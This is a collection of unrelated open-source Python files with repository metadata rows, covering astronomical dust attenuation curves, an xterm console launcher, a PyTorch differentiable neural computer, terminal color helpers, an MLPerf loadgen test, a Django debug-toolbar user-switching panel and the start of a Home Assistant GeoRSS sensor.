def powerlaw(wave, tau_v=1, alpha=1.0, **kwargs):
"""Simple power-law attenuation, normalized to 5500\AA.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
return tau_v * (wave / 5500)**(-alpha)
def calzetti(wave, tau_v=1, R_v=4.05, **kwargs):
"""Calzetti et al. 2000 starburst attenuation curve, with
extrapolations to the FUV and NIR.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the attenuation curve.
:param R_v: (default: 4.05)
The ratio of total selective extinction, parameterizing the slope of
the attenuation curve. A_v = R_v * E(B-V)
:returns tau:
The optical depth at each wavelength.
"""
# optical/NIR
k1 = lambda x: 2.659 * (-1.857 + 1.040 * x)
# UV
k2 = lambda x: 2.659 * (-2.156 + 1.509 * x - 0.198 * x**2. + 0.011 * x**3.)
# get slopes at edges and k(5500)
uv = np.array([0.12, 0.13]) * 1e4
kuv = k2(1e4 / uv) + R_v
uv_slope = np.diff(kuv) / np.diff(uv)
ir = np.array([2.19, 2.20]) * 1e4
kir = k1(1e4 / ir) + R_v
ir_slope = np.diff(kir) / np.diff(ir)
k_v = k2(1e4 / 5500.) + R_v
# define segments
uinds = (wave >= 1200.) & (wave < 6300) # uv
oinds = (wave >= 6300.) & (wave <= 22000) # optical
xinds = (wave < 1200.) # xuv
iinds = (wave > 22000.) # ir
# do it
x = 1e4 / wave
ktot = oinds * (k1(x) + R_v)
ktot += uinds * (k2(x) + R_v)
ktot += xinds * (kuv[0] + (wave - uv[0]) * uv_slope)
ktot += iinds * (kir[1] + (wave - ir[1]) * ir_slope)
ktot[ktot < 0] = 0
tau_lambda = tau_v * (ktot / k_v)
return tau_lambda
def drude(x, x0=4.59, gamma=0.90, **extras):
"""Drude profile for the 2175AA bump.
:param x:
Inverse wavelength (inverse microns) at which values for the drude
profile are requested.
:param gamma:
Width of the Drude profile (inverse microns).
:param x0:
Center of the Drude profile (inverse microns).
:returns k_lambda:
The value of the Drude profile at x, normalized such that the peak is 1.
"""
#return (w * gamma)**2 / ((w**2 - w0**2)**2 + (w * gamma)**2)
return (x*gamma)**2 / ((x**2 - x0**2)**2 + (x * gamma)**2)
def noll(wave, tau_v=1, delta=0.0, c_r=0.0, Ebump=0.0, **kwargs):
"""Noll 2009 attenuation curve. This is based on the Calzetti curve, with
added variable bump (as Drude) and overall slope change. Any extra
keywords are passed to the Drude (e.g. x0, gamma, both in inverse microns).
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the attenuation curve.
:param Ebump: (default: 0.0)
Stength of the 2175\AA bump. Normalizes the Drude profile.
:param delta: (default 0.)
Slope of the power-law that modifies the Calzetti curve.
:param c_r:
Constant used to alter R_v=A_V/E(B-V) of the curve. To maintain the
Calzetti R_v=4.05, use c_r = -delta. Note that even with c_r = -delta
the calzetti curve will not be recovered unless delta=0
:returns tau:
The optical depth at each wavelength.
"""
kcalz = calzetti(wave, tau_v=1.0, R_v=4.05) - 1
k = kcalz + Ebump / 4.05 * drude(1e4 / wave, **kwargs)
a = (k * (1 - 1.12 * c_r) + 1) * (wave / 5500.)**delta
return a * tau_v
def chevallard(wave, tau_v=1, **kwargs):
""" \tau_v dependent attenuation curves matched to disk RT models,
as in Chevallard et al. 2013. No UV bump (or indeed tests in the
UV at all).
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
# missing a UV bump
alpha_v = 2.8 / (1 + np.sqrt(tau_v)) # +/- 25%
bb = 0.3 - 0.05 * tau_v # +/- 10%
alpha = alpha_v + bb * (wave * 1e-4 - 0.55)
tau_lambda = tau_v * (wave / 5500.0)**(-alpha)
return tau_lambda
def conroy(wave, tau_v=1, R_v=3.1, f_bump=0.6, **kwargs):
""" Conroy & Schiminovich 2010 dust attenuation curves including a
decreased UV bump.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:param R_v: (default: 3.1)
The ratio of total selective extinction, parameterizing the
slope of the attenuation curve. A_v = R_v * E(B-V)
:param f_bump: (default: 0.6)
The strength of the 2175\AA UV bump, as a fraction of the bump
strength in Cardelli et al. extinction curve.
:returns tau:
The optical depth at each wavelength.
"""
x = 1e4 / wave
nx = x.shape[0]
a = np.zeros_like(x)
b = np.zeros_like(x)
# IR 0.909 - 3.3 micron
ir = (x >= 0.3) & (x < 1.1)
a[ir] = 0.574 * x[ir]**1.61
b[ir] = -0.527 * x[ir]**1.61
# optical 0.303 - 0.909 micron
opt = (x >= 1.1) & (x < 3.3)
y = x[opt]-1.82
a[opt] = (1 + 0.177 * y - 0.504 * y**2 - 0.0243 * y**3 +
0.721 * y**4 + 0.0198 * y**5 - 0.7750 * y**6 +
0.330 * y**7)
b[opt] = (1.413 * y + 2.283 * y**2 + 1.072 * y**3 -
5.384 * y**4 - 0.622 * y**5 + 5.303 * y**6 -
2.090 * y**7)
# NUV 0.17 to 0.303 micron
nuv = (x >= 3.3) & (x < 5.9)
tmp = (-0.0370 + 0.0469 * f_bump - 0.601 * f_bump / R_v + 0.542 / R_v)
fa = (3.3 / x[nuv])**6. * tmp
tmp = 0.104 * f_bump / ((x[nuv] - 4.67)**2 + 0.341)
a[nuv] = 1.752 - 0.316 * x[nuv] - tmp + fa
tmp = 1.206 * f_bump / ((x[nuv] - 4.62)**2 + 0.263)
b[nuv] = -3.09 + 1.825 * x[nuv] + tmp
# FUV 0.125 - 0.17 micron
fuv = (x >= 5.9) & (x < 8.0)
fa = -0.0447 * (x[fuv] - 5.9)**2.0 - 0.00978 * (x[fuv] - 5.9)**3
fb = 0.213 * (x[fuv] - 5.9)**2. + 0.121 * (x[fuv] - 5.9)**3
tmp = 0.104 * f_bump / ((x[fuv] - 4.67)**2 + 0.341)
a[fuv] = 1.752 - 0.316 * x[fuv] - tmp + fa
tmp = 1.206 * f_bump / ((x[fuv] - 4.62)**2 + 0.263)
b[fuv] = -3.09 + 1.825 * x[fuv] + tmp + fb
alam = (a + b / R_v)
# XUV below 1250AA
xuv = x >= 8.0
x8 = 8.0
fa = -0.0447 * (x8 - 5.9)**2 - 0.00978 * (x8 - 5.9)**3
fb = 0.213 * (x8 - 5.9)**2. + 0.121 * (x8 - 5.9)**3
tmp = 0.104 * f_bump / ((x8 - 4.67)**2 + 0.341)
af = 1.752 - 0.316 * x8 - tmp + fa
tmp = 1.206 * f_bump / ((x8 - 4.62)**2 + 0.263)
bf = -3.09 + 1.825 * x8 + tmp + fb
a8 = (af + bf / R_v)
alam[xuv] = (x8 / x[xuv])**(-1.3) * a8
return tau_v * alam
def broken_powerlaw(wave, tau_v=1, alpha=[0.7, 0.7, 0.7],
breaks=[0, 3000, 10000, 4e4], **kwargs):
""" Attenuation curve as in V. Wild et al. 2011, i.e. power-law
slope can change between regions. Superceded by Chevallard 2013
for optical/NIR.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
if len(breaks) == len(alpha)+1:
print("make sure of your power law breaks")
tau = np.array(len(wave))
for i in range(alpha):
inds = (wave > breaks[i]) & (wave <= breaks[i+1])
tau[inds] = tau_v * (wave / 5500)**alpha[i]
return tau
def wg00(wave, tau_v=1, geometry='SHELL', composition='MW',
local='homogenous', **kwargs):
""" Witt+Gordon 2000 DIRTY radiative transfer results, for
idealized geometries.
"""
pass
# ------------------
# EXTINCTION CURVES
# ------------------
def cardelli(wave, tau_v=1, R_v=3.1, **kwargs):
""" Cardelli, Clayton, and Mathis 1998 Milky Way extinction curve,
with an update in the near-UV from O'Donnell 1994
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:param R_v: (default: 3.1)
The ratio of total selective extinction, parameterizing the
slope of the attenuation curve. A_v = R_v * E(B-V)
:returns tau:
The optical depth at each wavelength.
"""
# if (wave < 1e3).any() :
# warnings.warn('Cardelli: extinction not defined (set to zero) below 1000AA')
mic = wave*1e-4
x_sup, x_inf = 10.0, 0.3
x = 1 / mic
a = np.zeros_like(x)
b = np.zeros_like(x)
w1 = (x >= 1.1) & (x <= 3.3) # Optical 0.303 to 0.909 micron
w2 = (x >= x_inf) & (x < 1.1) # NIR 0.909 to 3.3 micron
w3 = (x > 3.3) & (x <= 8) # UV 0.125 - 0.303 micron
w4 = (x > 8.0) & (x <= x_sup) # XUV, 1000 -1250AA
wsh = x > x_sup
wlg = x < x_inf
y = x[w1] - 1.82
a[w1] = (1 + 0.17699 * y - 0.50447 * y**2. - 0.02427 * y**3. +
0.72085 * y**4. + 0.01979 * y**5. - 0.77530 * y**6. +
0.32999 * y**7.0)
b[w1] = (1.41338 * y + 2.28305 * y**2. + 1.07233 * y**3. -
5.38434 * y**4. - 0.62251 * y**5. + 5.30260 * y**6. -
2.09002 * y**7.)
y = x[w2]**1.61
a[w2] = 0.574 * y
b[w2] = -0.527 * y
fa = x[w3] * 0.
fb = x[w3] * 0.
ou = (x[w3] > 5.9)
# print(type(ou),ou[0], type(w3))
if ou.any():
y = x[w3][ou] - 5.9
fa[ou] = -0.04473 * y**2. - 0.009779 * y**3.
fb[ou] = 0.2130 * y**2. + 0.1207 * y**3.
a[w3] = 1.752 - 0.316 * x[w3] - 0.104 / ((x[w3] - 4.67)**2. + 0.341) + fa
b[w3] = -3.090 + 1.825 * x[w3] + 1.206 / ((x[w3] - 4.62)**2. + 0.263) + fb
y = x[w4] - 8.
a[w4] = -1.073 - 0.628 * y + 0.137 * y**2. - 0.070 * y**3.
b[w4] = 13.670 + 4.257 * y - 0.420 * y**2. + 0.374 * y**3.
tau = a + b / R_v
return tau_v * tau
def smc(wave, tau_v=1, **kwargs):
"""Pei 1992 SMC extinction curve.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
if (wave < 1e3).any():
warnings.warn('SMC: extinction extrapolation below 1000AA is poor')
mic = wave * 1e-4
aa = [185., 27., 0.005, 0.010, 0.012, 0.030]
ll = [0.042, 0.08, 0.22, 9.7, 18., 25.]
bb = [90., 5.50, -1.95, -1.95, -1.80, 0.00]
nn = [2.0, 4.0, 2.0, 2.0, 2.0, 2.0]
abs_ab = np.zeros_like(mic)
norm_v = 0 # hack to go from tau_b to tau_v
mic_5500 = 5500 * 1e-4
for i, a in enumerate(aa):
norm_v += aa[i] / ((mic_5500 / ll[i])**nn[i] +
(ll[i] / mic_5500)**nn[i] + bb[i])
abs_ab += aa[i] / ((mic / ll[i])**nn[i] + (ll[i] / mic)**nn[i] + bb[i])
return tau_v * (abs_ab / norm_v)
def lmc(wave, tau_v=1, **kwargs):
""" Pei 1992 LMC extinction curve.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
if (wave < 1e3).any():
warnings.warn('LMC: extinction extrapolation below 1000AA is poor')
mic = wave * 1e-4
aa = [175., 19., 0.023, 0.005, 0.006, 0.020]
ll = [0.046, 0.08, 0.22, 9.7, 18., 25.]
bb = [90., 5.50, -1.95, -1.95, -1.80, 0.00]
nn = [2.0, 4.5, 2.0, 2.0, 2.0, 2.0]
abs_ab = mic * 0.
norm_v = 0 # hack to go from tau_b to tau_v
mic_5500 = 5500 * 1e-4
for i, a in enumerate(aa):
norm_v += aa[i] / ((mic_5500 / ll[i])**nn[i] +
(ll[i] / mic_5500)**nn[i] + bb[i])
abs_ab += aa[i] / ((mic / ll[i])**nn[i] + (ll[i] / mic)**nn[i] + bb[i])
return tau_v * (abs_ab / norm_v)
| gpl-2.0 | 6,990,991,466,777,430,000 | 31.1 | 86 | 0.529675 | false | 2.601621 | false | false | false |
jjgomera/pychemqt | tools/terminal.py | 1 | 2742 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
'''Pychemqt, Chemical Engineering Process simulator
Copyright (C) 2009-2017, Juan José Gómez Romera <jjgomera@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.'''
###############################################################################
# Tools to create a python shell with pychemqt libraries imported
# For now only work in linux with xterm as terminal
###############################################################################
import atexit
from PyQt5 import QtCore, QtWidgets
from tools.firstrun import which
class XTerm(QtCore.QProcess):
"""Gui container for terminal widget"""
def __init__(self, config, parent=None):
super(XTerm, self).__init__(parent)
self.config = config
atexit.register(self.kill)
self.show_term()
def sizeHint(self):
size = QtCore.QSize(400, 300)
return size.expandedTo(QtWidgets.QApplication.globalStrut())
def show_term(self):
term = self.config.get("Applications", 'Shell')
args = [
"-bg", self.config.get("Applications", "backgroundColor"),
"-fg", self.config.get("Applications", "foregroundColor"),
# blink cursor
"-bc",
# title
"-T", QtWidgets.QApplication.translate(
"pychemqt", "pychemqt python console")]
if self.config.getboolean("Applications", "maximized"):
args.append("-maximized")
if self.config.getboolean("Applications", 'ipython') and \
which("ipython"):
args.append("ipython3")
else:
args.append("python3")
self.start(term, args)
if self.error() == QtCore.QProcess.FailedToStart:
print("xterm not installed")
if __name__ == "__main__":
import sys
from configparser import ConfigParser
import os
app = QtWidgets.QApplication(sys.argv)
conf_dir = os.path.expanduser('~') + "/.pychemqt/"
pychemqt_dir = os.environ["PWD"] + "/"
preferences = ConfigParser()
preferences.read(conf_dir+"pychemqtrc")
terminal = XTerm(preferences)
app.exec_()
| gpl-3.0 | 4,019,939,832,573,192,000 | 32.012048 | 79 | 0.617518 | false | 4.22188 | true | false | false |
ixaxaar/pytorch-dnc | dnc/dnc.py | 1 | 10617 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import torch.nn as nn
import torch as T
from torch.autograd import Variable as var
import numpy as np
from torch.nn.utils.rnn import pad_packed_sequence as pad
from torch.nn.utils.rnn import pack_padded_sequence as pack
from torch.nn.utils.rnn import PackedSequence
from .util import *
from .memory import *
from torch.nn.init import orthogonal_, xavier_uniform_
class DNC(nn.Module):
def __init__(
self,
input_size,
hidden_size,
rnn_type='lstm',
num_layers=1,
num_hidden_layers=2,
bias=True,
batch_first=True,
dropout=0,
bidirectional=False,
nr_cells=5,
read_heads=2,
cell_size=10,
nonlinearity='tanh',
gpu_id=-1,
independent_linears=False,
share_memory=True,
debug=False,
clip=20
):
super(DNC, self).__init__()
# todo: separate weights and RNNs for the interface and output vectors
self.input_size = input_size
self.hidden_size = hidden_size
self.rnn_type = rnn_type
self.num_layers = num_layers
self.num_hidden_layers = num_hidden_layers
self.bias = bias
self.batch_first = batch_first
self.dropout = dropout
self.bidirectional = bidirectional
self.nr_cells = nr_cells
self.read_heads = read_heads
self.cell_size = cell_size
self.nonlinearity = nonlinearity
self.gpu_id = gpu_id
self.independent_linears = independent_linears
self.share_memory = share_memory
self.debug = debug
self.clip = clip
self.w = self.cell_size
self.r = self.read_heads
self.read_vectors_size = self.r * self.w
self.output_size = self.hidden_size
self.nn_input_size = self.input_size + self.read_vectors_size
self.nn_output_size = self.output_size + self.read_vectors_size
self.rnns = []
self.memories = []
for layer in range(self.num_layers):
if self.rnn_type.lower() == 'rnn':
self.rnns.append(nn.RNN((self.nn_input_size if layer == 0 else self.nn_output_size), self.output_size,
bias=self.bias, nonlinearity=self.nonlinearity, batch_first=True, dropout=self.dropout, num_layers=self.num_hidden_layers))
elif self.rnn_type.lower() == 'gru':
self.rnns.append(nn.GRU((self.nn_input_size if layer == 0 else self.nn_output_size),
self.output_size, bias=self.bias, batch_first=True, dropout=self.dropout, num_layers=self.num_hidden_layers))
if self.rnn_type.lower() == 'lstm':
self.rnns.append(nn.LSTM((self.nn_input_size if layer == 0 else self.nn_output_size),
self.output_size, bias=self.bias, batch_first=True, dropout=self.dropout, num_layers=self.num_hidden_layers))
setattr(self, self.rnn_type.lower() + '_layer_' + str(layer), self.rnns[layer])
# memories for each layer
if not self.share_memory:
self.memories.append(
Memory(
input_size=self.output_size,
mem_size=self.nr_cells,
cell_size=self.w,
read_heads=self.r,
gpu_id=self.gpu_id,
independent_linears=self.independent_linears
)
)
setattr(self, 'rnn_layer_memory_' + str(layer), self.memories[layer])
# only one memory shared by all layers
if self.share_memory:
self.memories.append(
Memory(
input_size=self.output_size,
mem_size=self.nr_cells,
cell_size=self.w,
read_heads=self.r,
gpu_id=self.gpu_id,
independent_linears=self.independent_linears
)
)
setattr(self, 'rnn_layer_memory_shared', self.memories[0])
# final output layer
self.output = nn.Linear(self.nn_output_size, self.input_size)
orthogonal_(self.output.weight)
if self.gpu_id != -1:
[x.cuda(self.gpu_id) for x in self.rnns]
[x.cuda(self.gpu_id) for x in self.memories]
self.output.cuda()
def _init_hidden(self, hx, batch_size, reset_experience):
# create empty hidden states if not provided
if hx is None:
hx = (None, None, None)
(chx, mhx, last_read) = hx
# initialize hidden state of the controller RNN
if chx is None:
h = cuda(T.zeros(self.num_hidden_layers, batch_size, self.output_size), gpu_id=self.gpu_id)
xavier_uniform_(h)
chx = [ (h, h) if self.rnn_type.lower() == 'lstm' else h for x in range(self.num_layers)]
# Last read vectors
if last_read is None:
last_read = cuda(T.zeros(batch_size, self.w * self.r), gpu_id=self.gpu_id)
# memory states
if mhx is None:
if self.share_memory:
mhx = self.memories[0].reset(batch_size, erase=reset_experience)
else:
mhx = [m.reset(batch_size, erase=reset_experience) for m in self.memories]
else:
if self.share_memory:
mhx = self.memories[0].reset(batch_size, mhx, erase=reset_experience)
else:
mhx = [m.reset(batch_size, h, erase=reset_experience) for m, h in zip(self.memories, mhx)]
return chx, mhx, last_read
def _debug(self, mhx, debug_obj):
if not debug_obj:
debug_obj = {
'memory': [],
'link_matrix': [],
'precedence': [],
'read_weights': [],
'write_weights': [],
'usage_vector': [],
}
debug_obj['memory'].append(mhx['memory'][0].data.cpu().numpy())
debug_obj['link_matrix'].append(mhx['link_matrix'][0][0].data.cpu().numpy())
debug_obj['precedence'].append(mhx['precedence'][0].data.cpu().numpy())
debug_obj['read_weights'].append(mhx['read_weights'][0].data.cpu().numpy())
debug_obj['write_weights'].append(mhx['write_weights'][0].data.cpu().numpy())
debug_obj['usage_vector'].append(mhx['usage_vector'][0].unsqueeze(0).data.cpu().numpy())
return debug_obj
def _layer_forward(self, input, layer, hx=(None, None), pass_through_memory=True):
(chx, mhx) = hx
# pass through the controller layer
input, chx = self.rnns[layer](input.unsqueeze(1), chx)
input = input.squeeze(1)
# clip the controller output
if self.clip != 0:
output = T.clamp(input, -self.clip, self.clip)
else:
output = input
# the interface vector
ξ = output
# pass through memory
if pass_through_memory:
if self.share_memory:
read_vecs, mhx = self.memories[0](ξ, mhx)
else:
read_vecs, mhx = self.memories[layer](ξ, mhx)
# the read vectors
read_vectors = read_vecs.view(-1, self.w * self.r)
else:
read_vectors = None
return output, (chx, mhx, read_vectors)
def forward(self, input, hx=(None, None, None), reset_experience=False, pass_through_memory=True):
# handle packed data
is_packed = type(input) is PackedSequence
if is_packed:
input, lengths = pad(input)
max_length = lengths[0]
else:
max_length = input.size(1) if self.batch_first else input.size(0)
lengths = [input.size(1)] * max_length if self.batch_first else [input.size(0)] * max_length
batch_size = input.size(0) if self.batch_first else input.size(1)
if not self.batch_first:
input = input.transpose(0, 1)
# make the data time-first
controller_hidden, mem_hidden, last_read = self._init_hidden(hx, batch_size, reset_experience)
# concat input with last read (or padding) vectors
inputs = [T.cat([input[:, x, :], last_read], 1) for x in range(max_length)]
# batched forward pass per element / word / etc
if self.debug:
viz = None
outs = [None] * max_length
read_vectors = None
# pass through time
for time in range(max_length):
# pass thorugh layers
for layer in range(self.num_layers):
# this layer's hidden states
chx = controller_hidden[layer]
m = mem_hidden if self.share_memory else mem_hidden[layer]
# pass through controller
outs[time], (chx, m, read_vectors) = \
self._layer_forward(inputs[time], layer, (chx, m), pass_through_memory)
# debug memory
if self.debug:
viz = self._debug(m, viz)
# store the memory back (per layer or shared)
if self.share_memory:
mem_hidden = m
else:
mem_hidden[layer] = m
controller_hidden[layer] = chx
if read_vectors is not None:
# the controller output + read vectors go into next layer
outs[time] = T.cat([outs[time], read_vectors], 1)
else:
outs[time] = T.cat([outs[time], last_read], 1)
inputs[time] = outs[time]
if self.debug:
viz = {k: np.array(v) for k, v in viz.items()}
viz = {k: v.reshape(v.shape[0], v.shape[1] * v.shape[2]) for k, v in viz.items()}
# pass through final output layer
inputs = [self.output(i) for i in inputs]
outputs = T.stack(inputs, 1 if self.batch_first else 0)
if is_packed:
outputs = pack(output, lengths)
if self.debug:
return outputs, (controller_hidden, mem_hidden, read_vectors), viz
else:
return outputs, (controller_hidden, mem_hidden, read_vectors)
def __repr__(self):
s = "\n----------------------------------------\n"
s += '{name}({input_size}, {hidden_size}'
if self.rnn_type != 'lstm':
s += ', rnn_type={rnn_type}'
if self.num_layers != 1:
s += ', num_layers={num_layers}'
if self.num_hidden_layers != 2:
s += ', num_hidden_layers={num_hidden_layers}'
if self.bias != True:
s += ', bias={bias}'
if self.batch_first != True:
s += ', batch_first={batch_first}'
if self.dropout != 0:
s += ', dropout={dropout}'
if self.bidirectional != False:
s += ', bidirectional={bidirectional}'
if self.nr_cells != 5:
s += ', nr_cells={nr_cells}'
if self.read_heads != 2:
s += ', read_heads={read_heads}'
if self.cell_size != 10:
s += ', cell_size={cell_size}'
if self.nonlinearity != 'tanh':
s += ', nonlinearity={nonlinearity}'
if self.gpu_id != -1:
s += ', gpu_id={gpu_id}'
if self.independent_linears != False:
s += ', independent_linears={independent_linears}'
if self.share_memory != True:
s += ', share_memory={share_memory}'
if self.debug != False:
s += ', debug={debug}'
if self.clip != 20:
s += ', clip={clip}'
s += ")\n" + super(DNC, self).__repr__() + \
"\n----------------------------------------\n"
return s.format(name=self.__class__.__name__, **self.__dict__)
| mit | 3,054,484,300,671,407,000 | 32.377358 | 155 | 0.595534 | false | 3.356736 | false | false | false |
ukncsc/viper | viper/common/colors.py | 9 | 1468 | # This file is part of Viper - https://github.com/viper-framework/viper
# See the file 'LICENSE' for copying permission.
import os
import sys
def color(text, color_code, readline=False):
"""Colorize text.
@param text: text.
@param color_code: color.
@return: colorized text.
"""
# $TERM under Windows:
# cmd.exe -> "" (what would you expect..?)
# cygwin -> "cygwin" (should support colors, but doesn't work somehow)
# mintty -> "xterm" (supports colors)
if sys.platform == "win32" and os.getenv("TERM") != "xterm":
return str(text)
if readline:
# special readline escapes to fix colored input promps
# http://bugs.python.org/issue17337
return "\x01\x1b[%dm\x02%s\x01\x1b[0m\x02" % (color_code, text)
return "\x1b[%dm%s\x1b[0m" % (color_code, text)
def black(text, readline=False):
return color(text, 30, readline)
def red(text, readline=False):
return color(text, 31, readline)
def green(text, readline=False):
return color(text, 32, readline)
def yellow(text, readline=False):
return color(text, 33, readline)
def blue(text, readline=False):
return color(text, 34, readline)
def magenta(text, readline=False):
return color(text, 35, readline)
def cyan(text, readline=False):
return color(text, 36, readline)
def white(text, readline=False):
return color(text, 37, readline)
def bold(text, readline=False):
return color(text, 1, readline)
| bsd-3-clause | -7,534,164,176,107,016,000 | 27.230769 | 74 | 0.662807 | false | 3.254989 | false | false | false |
mlperf/inference_results_v0.5 | closed/Google/code/resnet/tpu-resnet/third_party/mlperf/inference/loadgen/tests/perftests_null_sut.py | 5 | 2058 | # Copyright 2019 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Python version of perftests_null_sut.cc.
"""
from __future__ import print_function
from absl import app
import mlperf_loadgen
import numpy
def load_samples_to_ram(query_samples):
del query_samples
return
def unload_samples_from_ram(query_samples):
del query_samples
return
def issue_query(query_samples):
responses = []
for s in query_samples:
responses.append(mlperf_loadgen.QuerySampleResponse(s.id, 0, 0))
mlperf_loadgen.QuerySamplesComplete(responses)
def flush_queries():
pass
def process_latencies(latencies_ns):
print("Average latency: ")
print(numpy.mean(latencies_ns))
print("Median latency: ")
print(numpy.percentile(latencies_ns, 50))
print("90 percentile latency: ")
print(numpy.percentile(latencies_ns, 90))
def main(argv):
del argv
settings = mlperf_loadgen.TestSettings()
settings.scenario = mlperf_loadgen.TestScenario.SingleStream
settings.mode = mlperf_loadgen.TestMode.PerformanceOnly
sut = mlperf_loadgen.ConstructSUT(
issue_query, flush_queries, process_latencies)
qsl = mlperf_loadgen.ConstructQSL(
1024 * 1024, 1024, load_samples_to_ram, unload_samples_from_ram)
mlperf_loadgen.StartTest(sut, qsl, settings)
mlperf_loadgen.DestroyQSL(qsl)
mlperf_loadgen.DestroySUT(sut)
if __name__ == "__main__":
app.run(main)
| apache-2.0 | 2,030,145,179,946,737,400 | 27.985915 | 79 | 0.693878 | false | 3.616872 | false | false | false |
lamby/django-debug-toolbar-user-panel | debug_toolbar_user_panel/panels.py | 1 | 3985 | """
:mod:`django-debug-toolbar-user-panel`
======================================
Panel for the `Django Debug Toolbar <https://github.com/django-debug-toolbar/django-debug-toolbar>`_
to easily and quickly switch between users.
* View details on the currently logged in user.
* Login as any user from an arbitrary email address, username or user ID.
* Easily switch between recently logged in users.
.. figure:: screenshot.png
:align: center
The panel supports ``django.contrib.auth.models.User`` models that have had
the `username` field removed.
Installation
------------
Add ``debug_toolbar_user_panel`` to your ``INSTALLED_APPS``::
INSTALLED_APPS = (
...
'debug_toolbar_user_panel',
...
)
Add ``debug_toolbar_user_panel.panels.UserPanel`` to ``DEBUG_TOOLBAR_PANELS``::
DEBUG_TOOLBAR_PANELS = (
'debug_toolbar_user_panel.panels.UserPanel'
'debug_toolbar.panels.version.VersionDebugPanel',
'debug_toolbar.panels.timer.TimerDebugPanel',
'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',
'debug_toolbar.panels.headers.HeaderDebugPanel',
'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',
'debug_toolbar.panels.sql.SQLDebugPanel',
'debug_toolbar.panels.template.TemplateDebugPanel',
'debug_toolbar.panels.signals.SignalDebugPanel',
'debug_toolbar.panels.logger.LoggingPanel',
)
Links
-----
View/download code
https://github.com/playfire/django-debug-toolbar-user-panel
File a bug
https://github.com/playfire/django-debug-toolbar-user-panel/issues
"""
from django import VERSION
from django.conf import settings
from django.http import HttpResponseForbidden
from django.conf.urls import url
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth import get_user_model
from debug_toolbar.panels import DebugPanel
from . import views
from .forms import UserForm
class UserPanel(DebugPanel):
"""
Panel that allows you to login as other recently-logged in users.
"""
name = 'User'
has_content = True
@property
def nav_title(self):
return _('User')
@property
def url(self):
return ''
@property
def title(self):
return _('User')
@property
def nav_subtitle(self):
return self.is_authenticated(self.request) and self.request.user
template = 'debug_toolbar_user_panel/panel.html'
@property
def content(self):
if not getattr(settings, 'DEBUG_TOOLBAR_USER_DEBUG', settings.DEBUG):
return HttpResponseForbidden()
current = []
if self.is_authenticated(self.request):
for field in get_user_model()._meta.fields:
if field.name == 'password':
continue
current.append(
(field.attname, getattr(self.request.user, field.attname))
)
return render_to_string(self.template, {
'user': self.request.user,
'form': UserForm(),
'next': self.request.GET.get('next'),
'users': get_user_model().objects.order_by('-last_login')[:10],
'current': current,
})
def is_authenticated(self, request):
if VERSION >= (1, 10):
# Django 1.10 onwards `is_authenticated` is a property
return request.user.is_authenticated
return request.user.is_authenticated()
def process_response(self, request, response):
self.request = request
@classmethod
def get_urls(cls):
return (
url(r'^users/login/$', views.login_form,
name='debug-userpanel-login-form'),
url(r'^users/login/(?P<pk>-?\d+)$', views.login,
name='debug-userpanel-login'),
url(r'^users/logout$', views.logout,
name='debug-userpanel-logout'),
)
| bsd-3-clause | 3,879,896,755,053,177,300 | 28.518519 | 100 | 0.633626 | false | 3.985 | false | false | false |
HydrelioxGitHub/home-assistant | homeassistant/components/sensor/geo_rss_events.py | 4 | 5423 | """
Generic GeoRSS events service.
Retrieves current events (typically incidents or alerts) in GeoRSS format, and
shows information on events filtered by distance to the HA instance's location
and grouped by category.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.geo_rss_events/
"""
import logging
from datetime import timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_UNIT_OF_MEASUREMENT, CONF_NAME,
CONF_LATITUDE, CONF_LONGITUDE, CONF_RADIUS, CONF_URL)
from homeassistant.helpers.entity import Entity
REQUIREMENTS = ['georss_client==0.5']
_LOGGER = logging.getLogger(__name__)
ATTR_CATEGORY = 'category'
ATTR_DISTANCE = 'distance'
ATTR_TITLE = 'title'
CONF_CATEGORIES = 'categories'
DEFAULT_ICON = 'mdi:alert'
DEFAULT_NAME = "Event Service"
DEFAULT_RADIUS_IN_KM = 20.0
